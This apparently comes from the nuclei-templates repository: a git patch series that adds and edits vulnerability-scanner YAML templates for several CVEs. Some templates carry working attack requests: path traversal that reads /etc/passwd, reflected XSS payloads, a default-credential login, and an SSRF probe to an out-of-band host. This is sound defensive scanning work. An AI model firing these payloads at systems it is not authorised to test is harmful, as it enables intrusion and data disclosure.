| | | +| fortilogger | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | | opensmtpd | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | | zcms | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 0f79e9d451..63aa45943d 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | -| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | -| config | 90 | gaurang | 42 | workflows | 34 | | | | | +| cve | 533 | dhiyaneshdk | 232 | cves | 540 | info | 563 | http | 1624 | +| panel | 213 | pikpikcu | 219 | vulnerabilities | 249 | high | 436 | file | 43 | +| xss | 194 | pdteam | 189 | exposed-panels | 215 | medium | 363 | network | 35 | +| wordpress | 184 | dwisiswant0 | 126 | exposures | 170 | critical | 206 | dns | 11 | +| exposure | 178 | geeknik | 121 | technologies | 151 | low | 150 | | | +| rce | 177 | daffainfo | 108 | misconfiguration | 119 | | | | | +| lfi | 152 | madrobot | 60 | takeovers | 70 | | | | | +| cve2020 | 151 | princechaddha | 53 | default-logins | 49 | | | | | +| wp-plugin | 123 | gy741 | 50 | file | 43 | | | | | +| tech | 93 | gaurang | 42 | workflows | 34 | | | | | From b826d822685d7a9fdf63cf536371edf9c87729c6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 1 Aug 2021 06:40:11 +0700 Subject: [PATCH 1327/4083] Create CVE-2020-35598.yaml --- cves/2020/CVE-2020-35598.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2020/CVE-2020-35598.yaml diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml new file mode 100644 index 0000000000..b4ec328110 --- /dev/null +++ b/cves/2020/CVE-2020-35598.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-35598 + +info: + name: Advanced Comment System 1.0 - Path Traversal + author: daffainfo + severity: high + description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. + reference: | + - https://www.exploit-db.com/exploits/49343 + - https://www.cvedetails.com/cve/CVE-2020-35598 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 8801d2c3808962af0700839d81f3cd63336d7d85 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 1 Aug 2021 06:41:54 +0700 Subject: [PATCH 1328/4083] Create CVE-2016-10993.yaml --- cves/2016/CVE-2016-10993.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2016/CVE-2016-10993.yaml diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml new file mode 100644 index 0000000000..ae90ffbd64 --- /dev/null +++ b/cves/2016/CVE-2016-10993.yaml @@ -0,0 +1,31 @@ +id: CVE-2016-10993 + +info: + name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://www.vulnerability-lab.com/get_content.php?id=1808 + - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?s=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 7f608a2d5735111f68b56c478d1a70bf676c6a1c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 1 Aug 2021 07:33:05 +0700 Subject: [PATCH 1329/4083] Create CVE-2012-4253.yaml --- cves/2012/CVE-2012-4253.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2012/CVE-2012-4253.yaml diff --git a/cves/2012/CVE-2012-4253.yaml b/cves/2012/CVE-2012-4253.yaml new file mode 100644 index 0000000000..c683b8e11c --- /dev/null +++ b/cves/2012/CVE-2012-4253.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-4253 + +info: + name: MySQLDumper 1.24.4 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. + reference: | + - https://www.exploit-db.com/exploits/37129 + - https://www.cvedetails.com/cve/CVE-2012-4253 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 0653fdc4982369a833a38b055f3e424cb17d58e9 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 1 Aug 2021 09:43:53 +0700 Subject: [PATCH 1330/4083] Update CVE-2019-0221.yaml --- cves/2019/CVE-2019-0221.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index e447f070a6..e3112aee6c 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -7,6 +7,7 @@ info: reference: | - https://seclists.org/fulldisclosure/2019/May/50 - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ + - https://www.exploit-db.com/exploits/50119 description: | The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, @@ -18,6 +19,7 @@ requests: - method: GET path: - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" + - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" matchers-condition: and matchers: From 734dde35cccd0c35022a0578728e3fe5f046fce9 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 1 Aug 2021 08:52:30 +0300 Subject: [PATCH 1331/4083] Fix FP - https://github.com/projectdiscovery/nuclei-templates/issues/2217 --- cves/2020/CVE-2020-35489.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index 82d8a2fef0..bac1875c05 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -26,5 +26,11 @@ requests: - type: regex regex: - - '^= ([0-4]\.[0-9\.]+|5\.[0-2]|5\.[0-2]\.[0-9]+|5\.3\.[0-1]) =' + - '^== Changelog =="' + part: body + + - type: regex + regex: + - '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) =' + negative: true part: body \ No newline at end of file From 9dc30c37a21205ec148523221c41dd9d831e1f1e Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 1 Aug 2021 08:57:40 +0300 Subject: [PATCH 1332/4083] Description and reference --- cves/2016/CVE-2016-1000128.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index b3dea4bf0d..b0abb144a2 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -4,7 +4,10 @@ info: name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 + description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 + - https://wordpress.org/plugins/anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin requests: From 21b17993be52a30837eb622593ef4e33a2efbd05 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 1 Aug 2021 09:10:14 +0300 Subject: [PATCH 1333/4083] Better references --- cves/2019/CVE-2019-16332.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index 7a1a0b7835..4f4f37861c 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -5,7 +5,9 @@ info: author: daffainfo severity: medium description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. - reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 + reference: + - https://plugins.trac.wordpress.org/changeset/2152730 + - https://wordpress.org/plugins/api-bearer-auth/#developers tags: cve,cve2019,wordpress,xss,wp-plugin requests: From ac70ba03c70b5c12358340de8ac40cc5f1fb780b Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 1 Aug 2021 09:12:12 +0300 Subject: [PATCH 1334/4083] description and reference --- cves/2019/CVE-2019-3401.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml index 929a402725..9c2a7c4819 100644 --- a/cves/2019/CVE-2019-3401.yaml +++ b/cves/2019/CVE-2019-3401.yaml @@ -3,8 +3,10 @@ id: CVE-2019-3401 info: name: Atlassian JIRA Information Exposure (CVE-2019-3401) author: TechbrunchFR,milo2012 + description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. severity: info tags: cve,cve2019,jira,atlassian + reference: https://jira.atlassian.com/browse/JRASERVER-69244 requests: - method: GET From 3de7af60180810bb4170dabf51093813223486fb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 1 Aug 2021 09:14:14 +0300 Subject: [PATCH 1335/4083] Better reference --- cves/2021/CVE-2021-24320.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 27ed4e29d1..42b74d3987 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -5,7 +5,9 @@ info: author: daffainfo severity: medium description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320 + reference: + - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt + - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb tags: cve,cve2021,wordpress,xss,wp-plugin requests: From 03dfb4bff619dca90f0a18f75b39ad2bacd3d27a Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 1 Aug 2021 09:16:33 +0300 Subject: [PATCH 1336/4083] More references --- cves/2016/CVE-2016-1000128.yaml | 2 +- cves/2019/CVE-2019-16332.yaml | 2 +- cves/2021/CVE-2021-21389.yaml | 4 +++- cves/2021/CVE-2021-24320.yaml | 2 +- 4 files changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index b0abb144a2..27d47c8577 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 - reference: + reference: | - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index 4f4f37861c..3a7b34ee93 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. - reference: + reference: | - https://plugins.trac.wordpress.org/changeset/2152730 - https://wordpress.org/plugins/api-bearer-auth/#developers tags: cve,cve2019,wordpress,xss,wp-plugin diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index a2d992ffd9..8470485e9e 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -7,7 +7,9 @@ info: description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE reference: | - https://github.com/HoangKien1020/CVE-2021-21389 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21389 + - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/ + - https://codex.buddypress.org/releases/version-7-2-1/ + - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 tags: cve,cve2021,wordpress,wp-plugin,rce diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 42b74d3987..90776f8a1c 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. - reference: + reference: | - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb tags: cve,cve2021,wordpress,xss,wp-plugin From 1fbe66764d144325eb80cbd74e2f9ff7238d765e Mon Sep 17 00:00:00 2001 From: drighetto Date: Sun, 1 Aug 2021 10:18:36 +0200 Subject: [PATCH 1337/4083] Add a template the detect WS02 API Manager --- technologies/wso2-apimanager-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/wso2-apimanager-detect.yaml diff --git a/technologies/wso2-apimanager-detect.yaml b/technologies/wso2-apimanager-detect.yaml new file mode 100644 index 0000000000..a52c9b11c3 --- /dev/null +++ b/technologies/wso2-apimanager-detect.yaml @@ -0,0 +1,23 @@ +id: wso2-apimanager-detect + +info: + name: WSO2 API Manager detect + author: righettod + severity: info + description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint + tags: tech,wso2,api-manager + +requests: + - method: GET + path: + - "{{BaseURL}}/services/Version" + + matchers-condition: and + matchers: + - type: word + words: + - "version.services.core.carbon.wso2.org" + + - type: status + status: + - 200 From 36e66af09fec2e9c52890adadbc4046b908c163f Mon Sep 17 00:00:00 2001 From: drighetto Date: Sun, 1 Aug 2021 10:21:13 +0200 Subject: [PATCH 1338/4083] Fix linter error --- technologies/wso2-apimanager-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/wso2-apimanager-detect.yaml b/technologies/wso2-apimanager-detect.yaml index a52c9b11c3..3008bde941 100644 --- a/technologies/wso2-apimanager-detect.yaml +++ b/technologies/wso2-apimanager-detect.yaml @@ -4,7 +4,7 @@ info: name: WSO2 API Manager detect author: righettod severity: info - description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint + description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint tags: tech,wso2,api-manager requests: From aa4591f6908068093b63f322aa53d88dc49883e0 Mon Sep 17 00:00:00 2001 From: r3dg33k Date: Sun, 1 Aug 2021 06:02:19 -0400 Subject: [PATCH 1339/4083] guacamole-default-login --- .../guacamole/guacamole-default-login.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 default-logins/guacamole/guacamole-default-login.yaml diff --git a/default-logins/guacamole/guacamole-default-login.yaml b/default-logins/guacamole/guacamole-default-login.yaml new file mode 100644 index 0000000000..2f1fbfe08d --- /dev/null +++ b/default-logins/guacamole/guacamole-default-login.yaml @@ -0,0 +1,32 @@ +id: guacamole-default-admin + +info: + name: Guacamole Default Credentials + author: r3dg33k + severity: high + tags: guacamole,default-login + + # References: + # - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22. + +requests: + - raw: + - | + POST /api/tokens HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: application/x-www-form-urlencoded + Origin: {{Hostname}} + Referer: {{Hostname}} + + username=guacadmin&password=guacadmin + + matchers-condition: and + matchers: + - type: word + words: + - '"username":"guacadmin",' + + - type: status + status: + - 200 \ No newline at end of file From f2a52e9ad518413d679704ff1bcacc5d32743803 Mon Sep 17 00:00:00 2001 From: r3dg33k Date: Sun, 1 Aug 2021 08:06:02 -0400 Subject: [PATCH 1340/4083] guacamole-login-version-detect --- .../guacamole-login-version-detect.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 technologies/guacamole-login-version-detect.yaml diff --git a/technologies/guacamole-login-version-detect.yaml b/technologies/guacamole-login-version-detect.yaml new file mode 100644 index 0000000000..5dc5396520 --- /dev/null +++ b/technologies/guacamole-login-version-detect.yaml @@ -0,0 +1,29 @@ +id: Apache-Guacamole-version-detect + +info: + name: Apache Guacamole Login Page and version Detected + author: r3dg33k + severity: Info + tags: apache,guacamole + +requests: + - method: GET + path: + - "{{BaseURL}}/translations/en.json" + - "{{BaseURL}}:8080/translations/en.json" + + matchers-condition: and + matchers: + - type: word + words: + - 'Apache Guacamole' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - '"VERSION":"[0-9]+\.2\.0"' From 9cbb151600f88e15409c2f38ec7c76167a25d5fb Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 1 Aug 2021 10:59:39 -0500 Subject: [PATCH 1341/4083] Update CVE-2021-31581.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fixes https://github.com/projectdiscovery/nuclei-templates/issues/2285. 👍🏻 --- cves/2021/CVE-2021-31581.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml index d1ae4aeb7e..fac20d465c 100644 --- a/cves/2021/CVE-2021-31581.yaml +++ b/cves/2021/CVE-2021-31581.yaml @@ -25,3 +25,7 @@ requests: - "name:" - "pass:" condition: and + - type: word + words: + - "html>" + negative: true From 67e4998d3218da86692947855bb4a13c97d1d988 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 00:40:06 +0530 Subject: [PATCH 1342/4083] Update guacamole-login-version-detect.yaml --- technologies/guacamole-login-version-detect.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/technologies/guacamole-login-version-detect.yaml b/technologies/guacamole-login-version-detect.yaml index 5dc5396520..700e304c11 100644 --- a/technologies/guacamole-login-version-detect.yaml +++ b/technologies/guacamole-login-version-detect.yaml @@ -1,16 +1,15 @@ -id: Apache-Guacamole-version-detect +id: apache-guacamole info: - name: Apache Guacamole Login Page and version Detected + name: Apache Guacamole Login Page and version detection author: r3dg33k - severity: Info - tags: apache,guacamole + severity: info + tags: apache,guacamole,tech requests: - method: GET path: - "{{BaseURL}}/translations/en.json" - - "{{BaseURL}}:8080/translations/en.json" matchers-condition: and matchers: From 8df4939b6a44912a715d8571e6e42b5eb31c23f3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 2 Aug 2021 00:40:43 +0530 Subject: [PATCH 1343/4083] Rename guacamole-login-version-detect.yaml to apache-guacamole.yaml --- ...{guacamole-login-version-detect.yaml => apache-guacamole.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{guacamole-login-version-detect.yaml => apache-guacamole.yaml} (100%) diff --git a/technologies/guacamole-login-version-detect.yaml b/technologies/apache-guacamole.yaml similarity index 100% rename from technologies/guacamole-login-version-detect.yaml rename to technologies/apache-guacamole.yaml From 0146fd0c1101b764032dad407d388f58e10ccc18 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 00:44:34 +0530 Subject: [PATCH 1344/4083] Update apache-guacamole.yaml --- technologies/apache-guacamole.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/apache-guacamole.yaml b/technologies/apache-guacamole.yaml index 700e304c11..d5c7785ad8 100644 --- a/technologies/apache-guacamole.yaml +++ b/technologies/apache-guacamole.yaml @@ -6,7 +6,7 @@ info: severity: info tags: apache,guacamole,tech -requests: +requests: - method: GET path: - "{{BaseURL}}/translations/en.json" @@ -20,7 +20,7 @@ requests: - type: status status: - 200 - + extractors: - type: regex part: body From 5c22441bacaa9b3d559bd21e1afdc37de493b94a Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 01:11:43 +0530 Subject: [PATCH 1345/4083] Update CVE-2021-3223.yaml --- cves/2021/CVE-2021-3223.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 5088096d4a..d57e08a80c 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -16,13 +16,14 @@ requests: - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' + matchers-condition: or matchers: - type: regex + part: body regex: - "root:.*:0:0:" - type: word + part: body words: - - "username" - - "password" - "Node-RED web server is listening" From c7778257c3896cf5869a6e3454d9477a7d5670b9 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 2 Aug 2021 01:22:49 +0530 Subject: [PATCH 1346/4083] Update CVE-2019-8451.yaml --- cves/2019/CVE-2019-8451.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 046a1055aa..f9b1108f8a 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -9,7 +9,7 @@ info: - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 - https://hackerone.com/reports/713900 - tags: cve,cve2019,atlassian,jira,ssrf + tags: cve,cve2019,atlassian,jira,ssrf,oob requests: - method: POST @@ -26,4 +26,4 @@ requests: - type: word part: interactsh_protocol words: - - "dns" + - "http" From 5023dd6f9ca2aecae12cbc918061c96f5fc29e43 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 01:27:40 +0530 Subject: [PATCH 1347/4083] Update CVE-2019-8451.yaml --- cves/2019/CVE-2019-8451.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index f9b1108f8a..3aa88d0b97 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -16,8 +16,9 @@ requests: path: - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest' - data: | + body: | url=https://{{Hostname}}:443@{{interactsh-url}} + headers: X-Atlassian-token: no-check Content-Type: application/x-www-form-urlencoded From f5982c5d285d660c1c23d7ec3826a64b638a7e3e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 01:30:00 +0530 Subject: [PATCH 1348/4083] Update CVE-2019-8451.yaml --- cves/2019/CVE-2019-8451.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 3aa88d0b97..7ae7d5a1a4 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -27,4 +27,4 @@ requests: - type: word part: interactsh_protocol words: - - "http" + - "http" # Confirms the HTTP Interaction From b30a43f82177299637456bb0af16e60942463955 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 01:32:55 +0530 Subject: [PATCH 1349/4083] Revert "Auto Generated Templates Stats [Sat Jul 31 18:12:02 UTC 2021] :robot:" This reverts commit 5179b5ad7f839d9ff9f615d758b5d11a7a67218f. --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1273 